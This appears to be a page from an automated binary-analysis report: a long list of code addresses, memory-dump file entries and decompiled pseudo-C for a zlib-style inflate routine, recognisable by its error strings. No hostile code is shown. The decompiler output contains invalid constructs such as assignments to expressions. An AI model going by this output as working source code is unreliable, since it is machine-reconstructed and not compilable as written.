                                                                                                                                                                      0x0040bc93
                                                                                                                                                                      0x0040bc97
                                                                                                                                                                      0x0040bc99
                                                                                                                                                                      0x0040bc9c
                                                                                                                                                                      0x0040bca0
                                                                                                                                                                      0x0040bcaf
                                                                                                                                                                      0x0040bcb8
                                                                                                                                                                      0x0040bcba
                                                                                                                                                                      0x0040bcc5
                                                                                                                                                                      0x0040bcce
                                                                                                                                                                      0x0040bcd8
                                                                                                                                                                      0x0040bcdb
                                                                                                                                                                      0x0040bcdd
                                                                                                                                                                      0x0040bce1
                                                                                                                                                                      0x0040bceb
                                                                                                                                                                      0x0040bcf7
                                                                                                                                                                      0x0040bcfa
                                                                                                                                                                      0x0040bcfc
                                                                                                                                                                      0x0040bd17
                                                                                                                                                                      0x0040bd1b
                                                                                                                                                                      0x0040bd1d
                                                                                                                                                                      0x0040bd20
                                                                                                                                                                      0x0040bd26
                                                                                                                                                                      0x0040bd30
                                                                                                                                                                      0x0040bd39
                                                                                                                                                                      0x0040bd3c
                                                                                                                                                                      0x0040bd3e
                                                                                                                                                                      0x0040bd59
                                                                                                                                                                      0x0040bd5d
                                                                                                                                                                      0x0040bd5f
                                                                                                                                                                      0x0040bd62
                                                                                                                                                                      0x0040bd68
                                                                                                                                                                      0x0040bd72
                                                                                                                                                                      0x0040bd7b
                                                                                                                                                                      0x0040bd7e
                                                                                                                                                                      0x0040bd80
                                                                                                                                                                      0x0040bd97
                                                                                                                                                                      0x0040bd99
                                                                                                                                                                      0x0040bd9d
                                                                                                                                                                      0x0040bda3
                                                                                                                                                                      0x0040bda7
                                                                                                                                                                      0x0040bdaa
                                                                                                                                                                      0x0040bdb8
                                                                                                                                                                      0x0040bdbf
                                                                                                                                                                      0x0040bdc1
                                                                                                                                                                      0x0040bdd8
                                                                                                                                                                      0x0040bddc
                                                                                                                                                                      0x0040bdde
                                                                                                                                                                      0x0040bde1
                                                                                                                                                                      0x0040bde7
                                                                                                                                                                      0x0040bdf1
                                                                                                                                                                      0x0040bdfc
                                                                                                                                                                      0x0040bdff
                                                                                                                                                                      0x0040be01
                                                                                                                                                                      0x0040be18
                                                                                                                                                                      0x0040be1c
                                                                                                                                                                      0x0040be1e
                                                                                                                                                                      0x0040be21
                                                                                                                                                                      0x0040be27
                                                                                                                                                                      0x0040be2f
                                                                                                                                                                      0x0040be3b
                                                                                                                                                                      0x0040be3e
                                                                                                                                                                      0x0040be40
                                                                                                                                                                      0x0040be57
                                                                                                                                                                      0x0040be5b
                                                                                                                                                                      0x0040be5d
                                                                                                                                                                      0x0040be60
                                                                                                                                                                      0x0040be66
                                                                                                                                                                      0x0040be69
                                                                                                                                                                      0x0040be75
                                                                                                                                                                      0x0040be78
                                                                                                                                                                      0x0040be7a
                                                                                                                                                                      0x0040be9a
                                                                                                                                                                      0x0040be9e
                                                                                                                                                                      0x0040bea0
                                                                                                                                                                      0x0040bea3
                                                                                                                                                                      0x0040bea9
                                                                                                                                                                      0x0040beb3
                                                                                                                                                                      0x0040bebc
                                                                                                                                                                      0x0040bebf
                                                                                                                                                                      0x0040bec1
                                                                                                                                                                      0x0040bedc
                                                                                                                                                                      0x0040bee0
                                                                                                                                                                      0x0040bee2
                                                                                                                                                                      0x0040bee5
                                                                                                                                                                      0x0040beeb
                                                                                                                                                                      0x0040bef5
                                                                                                                                                                      0x0040befe
                                                                                                                                                                      0x0040bf01
                                                                                                                                                                      0x0040bf03
                                                                                                                                                                      0x0040bf16
                                                                                                                                                                      0x0040bf22
                                                                                                                                                                      0x0040bf26
                                                                                                                                                                      0x0040bf31
                                                                                                                                                                      0x0040bf34
                                                                                                                                                                      0x0040bf36
                                                                                                                                                                      0x0040bf3b
                                                                                                                                                                      0x0040bf3f
                                                                                                                                                                      0x0040bf42
                                                                                                                                                                      0x0040bf56
                                                                                                                                                                      0x0040bf5f
                                                                                                                                                                      0x0040bf63
                                                                                                                                                                      0x0040bf6c
                                                                                                                                                                      0x0040bf6e
                                                                                                                                                                      0x0040bf72
                                                                                                                                                                      0x0040bf7e
                                                                                                                                                                      0x0040bf8b
                                                                                                                                                                      0x0040bf8d
                                                                                                                                                                      0x0040bf94
                                                                                                                                                                      0x0040bf9d
                                                                                                                                                                      0x0040bfa5
                                                                                                                                                                      0x0040bfa9
                                                                                                                                                                      0x0040bfab
                                                                                                                                                                      0x0040bfb9
                                                                                                                                                                      0x0040bfbc
                                                                                                                                                                      0x0040bfbe
                                                                                                                                                                      0x0040bfc9
                                                                                                                                                                      0x0040bfcd
                                                                                                                                                                      0x0040bfe2
                                                                                                                                                                      0x0040bfe6
                                                                                                                                                                      0x0040bfe8
                                                                                                                                                                      0x0040bfec
                                                                                                                                                                      0x0040bff0
                                                                                                                                                                      0x0040bff3
                                                                                                                                                                      0x0040bffe
                                                                                                                                                                      0x0040c001
                                                                                                                                                                      0x0040c00b
                                                                                                                                                                      0x0040c00f
                                                                                                                                                                      0x0040c014
                                                                                                                                                                      0x0040c029
                                                                                                                                                                      0x0040c02d
                                                                                                                                                                      0x0040c02f
                                                                                                                                                                      0x0040c033
                                                                                                                                                                      0x0040c036
                                                                                                                                                                      0x0040c03a
                                                                                                                                                                      0x0040c045
                                                                                                                                                                      0x0040c048
                                                                                                                                                                      0x0040c052
                                                                                                                                                                      0x0040c056
                                                                                                                                                                      0x0040c05d
                                                                                                                                                                      0x0040c066
                                                                                                                                                                      0x0040c06c
                                                                                                                                                                      0x0040c071
                                                                                                                                                                      0x0040c07b
                                                                                                                                                                      0x0040c07d
                                                                                                                                                                      0x0040c083
                                                                                                                                                                      0x0040c08e
                                                                                                                                                                      0x0040c091
                                                                                                                                                                      0x0040c093
                                                                                                                                                                      0x0040c0a4
                                                                                                                                                                      0x0040c0aa
                                                                                                                                                                      0x0040c0af
                                                                                                                                                                      0x0040c0b9
                                                                                                                                                                      0x0040c0bb
                                                                                                                                                                      0x0040c0c1
                                                                                                                                                                      0x0040c0cd
                                                                                                                                                                      0x0040c0d0
                                                                                                                                                                      0x0040c0d2
                                                                                                                                                                      0x0040c0e5
                                                                                                                                                                      0x0040c0e8
                                                                                                                                                                      0x0040c0f0
                                                                                                                                                                      0x0040c0fa
                                                                                                                                                                      0x0040c10d
                                                                                                                                                                      0x0040c114
                                                                                                                                                                      0x0040c11a
                                                                                                                                                                      0x0040c12b
                                                                                                                                                                      0x0040c12e
                                                                                                                                                                      0x0040c131
                                                                                                                                                                      0x0040c134
                                                                                                                                                                      0x0040c136
                                                                                                                                                                      0x0040c140
                                                                                                                                                                      0x0040c143
                                                                                                                                                                      0x0040c14b
                                                                                                                                                                      0x0040c156
                                                                                                                                                                      0x0040c15b
                                                                                                                                                                      0x0040c15f
                                                                                                                                                                      0x0040c173
                                                                                                                                                                      0x0040c17d
                                                                                                                                                                      0x0040c180
                                                                                                                                                                      0x0040c182
                                                                                                                                                                      0x0040c189
                                                                                                                                                                      0x0040c18e
                                                                                                                                                                      0x0040c19d
                                                                                                                                                                      0x0040c1a1
                                                                                                                                                                      0x0040c1a5
                                                                                                                                                                      0x0040c1ad
                                                                                                                                                                      0x0040c1b2
                                                                                                                                                                      0x0040c1b5
                                                                                                                                                                      0x0040c1b7
                                                                                                                                                                      0x0040c1bc
                                                                                                                                                                      0x0040c1c4
                                                                                                                                                                      0x0040c1c9
                                                                                                                                                                      0x0040c1d8
                                                                                                                                                                      0x0040c1dc
                                                                                                                                                                      0x0040c1e3
                                                                                                                                                                      0x0040c1e8
                                                                                                                                                                      0x0040c1eb
                                                                                                                                                                      0x0040c1ed
                                                                                                                                                                      0x0040c1f2
                                                                                                                                                                      0x0040c1fa
                                                                                                                                                                      0x0040c1ff
                                                                                                                                                                      0x0040c20e
                                                                                                                                                                      0x0040c212
                                                                                                                                                                      0x0040c21a
                                                                                                                                                                      0x0040c21f
                                                                                                                                                                      0x0040c222
                                                                                                                                                                      0x0040c228
                                                                                                                                                                      0x0040c22c
                                                                                                                                                                      0x0040c239
                                                                                                                                                                      0x0040c244
                                                                                                                                                                      0x0040c248
                                                                                                                                                                      0x0040c24c
                                                                                                                                                                      0x0040c250
                                                                                                                                                                      0x0040c253
                                                                                                                                                                      0x0040c25d
                                                                                                                                                                      0x0040c261
                                                                                                                                                                      0x0040c267
                                                                                                                                                                      0x0040c270
                                                                                                                                                                      0x0040c273
                                                                                                                                                                      0x0040c275
                                                                                                                                                                      0x0040c283
                                                                                                                                                                      0x0040c28e
                                                                                                                                                                      0x0040c292
                                                                                                                                                                      0x0040c294
                                                                                                                                                                      0x0040c298
                                                                                                                                                                      0x0040c29c
                                                                                                                                                                      0x0040c2a5
                                                                                                                                                                      0x0040c2a8
                                                                                                                                                                      0x0040c2aa
                                                                                                                                                                      0x0040c2b3
                                                                                                                                                                      0x0040c2be
                                                                                                                                                                      0x0040c2c2
                                                                                                                                                                      0x0040c2c4
                                                                                                                                                                      0x0040c2c8
                                                                                                                                                                      0x0040c2cc
                                                                                                                                                                      0x0040c2d5
                                                                                                                                                                      0x0040c2d8
                                                                                                                                                                      0x0040c2da
                                                                                                                                                                      0x0040c2e3
                                                                                                                                                                      0x0040c2ee
                                                                                                                                                                      0x0040c2f4
                                                                                                                                                                      0x0040c2f8
                                                                                                                                                                      0x0040c303
                                                                                                                                                                      0x0040c306
                                                                                                                                                                      0x0040c308
                                                                                                                                                                      0x0040c30d
                                                                                                                                                                      0x0040c315
                                                                                                                                                                      0x0040c326
                                                                                                                                                                      0x0040c32c
                                                                                                                                                                      0x0040c32f
                                                                                                                                                                      0x0040c338
                                                                                                                                                                      0x0040c33c
                                                                                                                                                                      0x0040c343
                                                                                                                                                                      0x0040c346
                                                                                                                                                                      0x0040c348
                                                                                                                                                                      0x0040c34f
                                                                                                                                                                      0x0040c355
                                                                                                                                                                      0x0040c360
                                                                                                                                                                      0x0040c364
                                                                                                                                                                      0x0040c368
                                                                                                                                                                      0x0040c371
                                                                                                                                                                      0x0040c373
                                                                                                                                                                      0x0040c377
                                                                                                                                                                      0x0040c384
                                                                                                                                                                      0x0040c387
                                                                                                                                                                      0x0040c389
                                                                                                                                                                      0x0040c390
                                                                                                                                                                      0x0040c39d
                                                                                                                                                                      0x0040c3a2
                                                                                                                                                                      0x0040c3a8
                                                                                                                                                                      0x0040c3ac
                                                                                                                                                                      0x0040c3ae
                                                                                                                                                                      0x0040c3b6
                                                                                                                                                                      0x0040c3ca
                                                                                                                                                                      0x0040c3d7
                                                                                                                                                                      0x0040c3db
                                                                                                                                                                      0x0040c3e6
                                                                                                                                                                      0x0040c3eb
                                                                                                                                                                      0x0040c3ed
                                                                                                                                                                      0x0040c3f3
                                                                                                                                                                      0x0040c3f6
                                                                                                                                                                      0x0040c3f9
                                                                                                                                                                      0x0040c405
                                                                                                                                                                      0x0040c40a
                                                                                                                                                                      0x0040c40e
                                                                                                                                                                      0x0040c41b
                                                                                                                                                                      0x0040c41e
                                                                                                                                                                      0x0040c420
                                                                                                                                                                      0x0040c423
                                                                                                                                                                      0x0040c427
                                                                                                                                                                      0x0040c43c
                                                                                                                                                                      0x0040c447
                                                                                                                                                                      0x0040c449
                                                                                                                                                                      0x0040c44f
                                                                                                                                                                      0x0040c452
                                                                                                                                                                      0x0040c455
                                                                                                                                                                      0x0040c45f
                                                                                                                                                                      0x0040c462
                                                                                                                                                                      0x0040c464
                                                                                                                                                                      0x0040c471
                                                                                                                                                                      0x0040c47a
                                                                                                                                                                      0x0040c482
                                                                                                                                                                      0x0040c484
                                                                                                                                                                      0x0040c48a
                                                                                                                                                                      0x0040c498
                                                                                                                                                                      0x0040c49b
                                                                                                                                                                      0x0040c49d
                                                                                                                                                                      0x0040c4ac
                                                                                                                                                                      0x0040c4b1
                                                                                                                                                                      0x0040c4b9
                                                                                                                                                                      0x0040c4bb
                                                                                                                                                                      0x0040c4c1
                                                                                                                                                                      0x0040c4cf
                                                                                                                                                                      0x0040c4d2
                                                                                                                                                                      0x0040c4d4
                                                                                                                                                                      0x0040c4e3
                                                                                                                                                                      0x0040c4ec
                                                                                                                                                                      0x0040c4ee
                                                                                                                                                                      0x0040c4f2
                                                                                                                                                                      0x0040c4f8
                                                                                                                                                                      0x0040c504
                                                                                                                                                                      0x0040c508
                                                                                                                                                                      0x0040c50a
                                                                                                                                                                      0x0040c51f
                                                                                                                                                                      0x0040c522
                                                                                                                                                                      0x0040c524
                                                                                                                                                                      0x0040c52a
                                                                                                                                                                      0x0040c537
                                                                                                                                                                      0x0040c53a
                                                                                                                                                                      0x0040c53c
                                                                                                                                                                      0x0040c543
                                                                                                                                                                      0x0040c554
                                                                                                                                                                      0x0040c556
                                                                                                                                                                      0x0040c55c
                                                                                                                                                                      0x0040c567
                                                                                                                                                                      0x0040c56a
                                                                                                                                                                      0x0040c56c
                                                                                                                                                                      0x0040c573
                                                                                                                                                                      0x0040c58a
                                                                                                                                                                      0x0040c58e
                                                                                                                                                                      0x0040c59a
                                                                                                                                                                      0x0040c59d
                                                                                                                                                                      0x0040c59f
                                                                                                                                                                      0x0040c5a4
                                                                                                                                                                      0x0040c5ac
                                                                                                                                                                      0x0040c5b7
                                                                                                                                                                      0x0040c5b9
                                                                                                                                                                      0x0040c5bc
                                                                                                                                                                      0x0040c5c0
                                                                                                                                                                      0x0040c5c3
                                                                                                                                                                      0x0040c5c6
                                                                                                                                                                      0x0040c5c8
                                                                                                                                                                      0x0040c5cb
                                                                                                                                                                      0x0040c5d5

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                      • Opcode ID: 34b2f9d877e9efbc64ac028f8f3fe2ac4adc3a0a84f85d592758749353ac592b
                                                                                                                                                                      • Instruction ID: f2dc5ed03a1e2096f90d6f77f129f34a731bb7955bd9b15b58ffdb1364811827
                                                                                                                                                                      • Opcode Fuzzy Hash: 34b2f9d877e9efbc64ac028f8f3fe2ac4adc3a0a84f85d592758749353ac592b
                                                                                                                                                                      • Instruction Fuzzy Hash: 67D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040F1CA, Relevance: 2.1, Strings: 1, Instructions: 840COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                      			E0040F1CA(signed char* __ebx, unsigned int __edx, void** __edi, signed int __esi) {
				signed int _t697;
				signed int _t727;
				intOrPtr _t729;
				signed int _t737;
				void* _t741;
				void* _t742;
				void* _t743;
				void* _t748;
				signed int _t751;
				signed int _t867;
				signed char* _t868;
				void** _t870;
				signed char** _t894;
				signed char** _t901;
				signed int _t1012;
				unsigned int _t1014;
				signed int _t1015;
				signed int _t1016;
				intOrPtr _t1019;
				void* _t1020;
				void** _t1063;
				signed int _t1064;
				signed char** _t1065;
				signed int _t1091;
				int _t1093;
				signed int _t1097;
				intOrPtr _t1099;
				signed int _t1100;
				void* _t1104;

				L0:
				while(1) {
					L0:
					_t1091 = __esi;
					_t1063 = __edi;
					_t1014 = __edx;
					_t868 = __ebx;
					if(__esi >= 0xe) {
						goto L182;
					}
					L178:
					while(1) {
						L179:
						if(__ebp == 0) {
							break;
						}
						L180:
						__eax =  *__ebx & 0x000000ff;
						__eax = ( *__ebx & 0x000000ff) << __cl;
						__ebx = __ebx + 1;
						__edx = __edx + __eax;
						 *(__esp + 0x14) = __ebx;
						__esi = __esi + 8;
						 *(__esp + 0x10) = __edx;
						__ebp = __ebp - 1;
						if(__esi < 0xe) {
							continue;
						} else {
							L181:
							goto L182;
						}
						L360:
					}
					L95:
					_t1064 =  *(_t1104 + 0x10);
					L96:
					_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
					L97:
					_t901 =  *(_t1104 + 0x48);
					_t870 =  *(_t1104 + 0x20);
					_t901[3] =  *(_t1104 + 0x24);
					_t901[4] =  *(_t1104 + 0x18);
					_t901[1] = _t1097;
					_t1099 =  *((intOrPtr*)(_t1104 + 0x28));
					 *_t901 =  *(_t1104 + 0x14);
					_t870[0xe] = _t1064;
					_t870[0xf] = _t1091;
					if(_t870[0xa] != 0) {
						L102:
						_t727 = E004101E0(_t901, _t901[3], _t1099 - _t901[4]);
						_t1104 = _t1104 + 0xc;
						if(_t727 == 0) {
							L343:
							_t901 =  *(_t1104 + 0x48);
							goto L344;
						} else {
							L103:
							 *_t870 = 0x1e;
							L104:
							_t737 = 0xfffffffc;
							goto L105;
						}
					} else {
						L98:
						if(_t1099 == _t901[4]) {
							L344:
							_t729 =  *((intOrPtr*)(_t1104 + 0x3c)) - _t901[1];
							_t1100 = _t1099 - _t901[4];
							_t901[2] =  &(_t901[2][_t729]);
							_t901[5] =  &(_t901[5][_t1100]);
							_t870[7] = _t870[7] + _t1100;
							 *((intOrPtr*)(_t1104 + 0x3c)) = _t729;
							if(_t870[2] == 0) {
								L349:
								_t1065 =  *(_t1104 + 0x48);
							} else {
								L345:
								if(_t1100 == 0) {
									goto L349;
								} else {
									L346:
									_push(_t1100);
									_push(_t901[3] - _t1100);
									_push(_t870[6]);
									if(_t870[4] == 0) {
										_t741 = E00410AD0();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t741;
										_t1065[0xc] = _t741;
									} else {
										_t742 = E004102D0();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t742;
										_t1065[0xc] = _t742;
									}
								}
							}
							L350:
							_t1020 =  *_t870;
							if(_t1020 == 0x13) {
								L353:
								_t1093 = 0x100;
							} else {
								L351:
								if(_t1020 == 0xe) {
									goto L353;
								} else {
									L352:
									_t1093 = 0;
								}
							}
							L354:
							asm("sbb ecx, ecx");
							_t1020 - 0xb =  *((intOrPtr*)(_t1104 + 0x3c));
							_t1065[0xb] = ((0 | _t1020 != 0x0000000b) - 0x00000001 & 0x00000080) + ( ~(_t870[1]) & 0x00000040) + _t1093 + _t870[0xf];
							if( *((intOrPtr*)(_t1104 + 0x3c)) != 0) {
								L356:
								if( *((intOrPtr*)(_t1104 + 0x4c)) != 4) {
									L359:
									return  *(_t1104 + 0x2c);
								} else {
									goto L357;
								}
							} else {
								L355:
								if(_t1100 == 0) {
									L357:
									_t737 =  *(_t1104 + 0x2c);
									if(_t737 != 0) {
										L105:
										return _t737;
									} else {
										L358:
										return 0xfffffffb;
									}
								} else {
									goto L356;
								}
							}
						} else {
							L99:
							_t743 =  *_t870;
							if(_t743 >= 0x1d) {
								goto L344;
							} else {
								L100:
								if(_t743 < 0x1a) {
									goto L102;
								} else {
									L101:
									if(_t1019 == 4) {
										goto L344;
									} else {
										goto L102;
									}
								}
							}
						}
					}
					goto L360;
					L182:
					_t1091 = _t1091 - 0xe;
					_t1015 = _t1014 >> 5;
					_t1063[0x18] = (_t1014 & 0x0000001f) + 0x101;
					_t1016 = _t1015 >> 5;
					_t1063[0x19] = 1 + (_t1015 & 0x0000001f);
					_t1014 = _t1016 >> 4;
					 *(_t1104 + 0x10) = _t1014;
					_t1063[0x17] = (_t1016 & 0x0000000f) + 4;
					if(_t1063[0x18] > 0x11e) {
						L195:
						_t894[6] = "too many length or distance symbols";
						 *_t1063 = 0x1d;
						goto L175;
					} else {
						L183:
						if(_t1063[0x19] > 0x1e) {
							goto L195;
						} else {
							L184:
							_t1063[0x1a] = 0;
							 *_t1063 = 0x11;
							L185:
							if(_t1063[0x1a] >= _t1063[0x17]) {
								L191:
								while(_t1063[0x1a] < 0x13) {
									L192:
									 *(_t1063 + 0x70 + ( *(0x412fb8 + _t1063[0x1a] * 2) & 0x0000ffff) * 2) = 0;
									_t1063[0x1a] = 1 + _t1063[0x1a];
								}
								L193:
								_t748 =  &(_t1063[0x14c]);
								_t1063[0x15] = 7;
								_t1063[0x13] = _t748;
								_t1063[0x1b] = _t748;
								_t751 = E00410DF0(0,  &(_t1063[0x1c]), 0x13,  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
								_t1104 = _t1104 + 0x18;
								 *(_t1104 + 0x2c) = _t751;
								if(_t751 == 0) {
									L196:
									_t1063[0x1a] = 0;
									 *_t1063 = 0x12;
									goto L197;
								} else {
									L194:
									_t894 =  *(_t1104 + 0x48);
									_t1014 =  *(_t1104 + 0x10);
									_t894[6] = "invalid code lengths set";
									 *_t1063 = 0x1d;
									while(1) {
										L175:
										_t697 =  *_t1063;
										if(_t697 > 0x1e) {
											break;
										}
										L1:
										switch( *((intOrPtr*)(_t697 * 4 +  &M0040FE40))) {
											case 0:
												L2:
												_t707 = _t1063[2];
												if(_t707 != 0) {
													L4:
													__eflags = _t1091 - 0x10;
													if(_t1091 >= 0x10) {
														L9:
														__eflags = _t707 & 0x00000002;
														if((_t707 & 0x00000002) == 0) {
															L12:
															_t708 = _t1063[8];
															_t1063[4] = 0;
															__eflags = _t708;
															if(_t708 != 0) {
																 *(_t708 + 0x30) = 0xffffffff;
															}
															L14:
															__eflags = _t1063[2] & 0x00000001;
															if((_t1063[2] & 0x00000001) == 0) {
																L24:
																_t894[6] = "incorrect header check";
																 *_t1063 = 0x1d;
															} else {
																L15:
																_t711 = (_t1014 >> 8) + ((_t1014 & 0x000000ff) << 8);
																__eflags = _t711 % 0x1f;
																_t1014 =  *(_t1104 + 0x10);
																if(_t711 % 0x1f != 0) {
																	_t894 =  *(_t1104 + 0x48);
																	goto L24;
																} else {
																	L16:
																	__eflags = (_t1014 & 0x0000000f) - 8;
																	if((_t1014 & 0x0000000f) == 8) {
																		L18:
																		_t715 = _t1063[9];
																		_t1091 = _t1091 - 4;
																		_t1014 = _t1014 >> 4;
																		 *(_t1104 + 0x10) = _t1014;
																		_t900 = (_t1014 & 0x0000000f) + 8;
																		__eflags = _t715;
																		if(_t715 != 0) {
																			L21:
																			__eflags = _t900 - _t715;
																			if(_t900 <= _t715) {
																				goto L20;
																			} else {
																				_t894 =  *(_t1104 + 0x48);
																				_t894[6] = "invalid window size";
																				 *_t1063 = 0x1d;
																			}
																		} else {
																			_t1063[9] = _t900;
																			L20:
																			_push(0);
																			_push(0);
																			_push(0);
																			_t1063[5] = 1 << _t900;
																			_t718 = E00410AD0();
																			_t1021 =  *(_t1104 + 0x1c);
																			_t1104 = _t1104 + 0xc;
																			_t894 =  *(_t1104 + 0x48);
																			_t1063[6] = _t718;
																			_t894[0xc] = _t718;
																			 *_t1063 =  !(_t1021 >> 8) & 0x00000002 | 0x00000009;
																			_t1014 = 0;
																			 *(_t1104 + 0x10) = 0;
																			_t1091 = 0;
																		}
																	} else {
																		_t894 =  *(_t1104 + 0x48);
																		_t894[6] = "unknown compression method";
																		 *_t1063 = 0x1d;
																	}
																}
															}
														} else {
															L10:
															__eflags = _t1014 - 0x8b1f;
															if(_t1014 != 0x8b1f) {
																goto L12;
															} else {
																_push(0);
																_push(0);
																_push(0);
																_t1063[6] = E004102D0();
																_push(2);
																_push(_t1104 + 0x28);
																 *(_t1104 + 0x30) = 0x8b1f;
																_push(_t1063[6]);
																_t721 = E004102D0();
																_t1014 = 0;
																_t1063[6] = _t721;
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x10) = 0;
																_t1091 = 0;
																 *_t1063 = 1;
																goto L174;
															}
														}
														goto L175;
													} else {
														while(1) {
															L6:
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L95;
															}
															L7:
															_t745 = ( *_t868 & 0x000000ff) << _t1091;
															_t868 =  &(_t868[1]);
															_t1014 = _t1014 + _t745;
															 *(_t1104 + 0x14) = _t868;
															_t1091 = _t1091 + 8;
															 *(_t1104 + 0x10) = _t1014;
															_t1097 = _t1097 - 1;
															__eflags = _t1091 - 0x10;
															if(_t1091 < 0x10) {
																continue;
															} else {
																_t707 = _t1063[2];
																_t894 =  *(_t1104 + 0x48);
																goto L9;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													 *_t1063 = 0xc;
													goto L175;
												}
												goto L360;
											case 1:
												L25:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L29:
													__edi[4] = __edx;
													__eflags = __dl - 8;
													if(__dl == 8) {
														L31:
														__eflags = __edx & 0x0000e000;
														if((__edx & 0x0000e000) == 0) {
															L33:
															__ecx = __edi[8];
															__eflags = __ecx;
															if(__ecx != 0) {
																__edx = __edx >> 8;
																__eax = __edx >> 0x00000008 & 0x00000001;
																__eflags = __eax;
																 *__ecx = __eax;
															}
															__eflags = __edi[4] & 0x00000200;
															if((__edi[4] & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __dl;
																__eax = __esp + 0x1c;
																_push(2);
																__eflags = __edx;
																_push(__eax);
																 *(__esp + 0x25) = __dl;
																_push(__edi[6]);
																__eax = E004102D0();
																__esp = __esp + 0xc;
																__edi[6] = __eax;
															}
															__edx = 0;
															 *__edi = 2;
															 *(__esp + 0x10) = 0;
															__esi = 0;
															goto L40;
														} else {
															L32:
															 *(0x18 + __ecx) = "unknown header flags set";
															 *__edi = 0x1d;
															goto L175;
														}
													} else {
														L30:
														 *(0x18 + __ecx) = "unknown compression method";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													while(1) {
														L26:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L27:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															__ecx =  *(__esp + 0x48);
															goto L29;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 2:
												L38:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L42:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 4) = __edx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														__eax = __edx;
														 *(__esp + 0x1c) = __dl;
														__eax = __edx >> 8;
														 *(__esp + 0x1d) = __al;
														__edx = __edx >> 0x10;
														 *(__esp + 0x1e) = __al;
														__eax = __esp + 0x1c;
														_push(4);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x27) = __dl;
														_push(__edi[6]);
														__eax = E004102D0();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 3;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L49;
												} else {
													L39:
													while(1) {
														L40:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L41:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L42;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 3:
												L47:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L51:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax = __dl & 0x000000ff;
														 *(__ecx + 8) = __dl & 0x000000ff;
														__ecx = __edx;
														__eax = __edi[8];
														__ecx = __edx >> 8;
														__eflags = __ecx;
														 *(0xc + __edi[8]) = __ecx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push(__edi[6]);
														__eax = E004102D0();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 4;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													goto L56;
												} else {
													L48:
													while(1) {
														L49:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L50:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
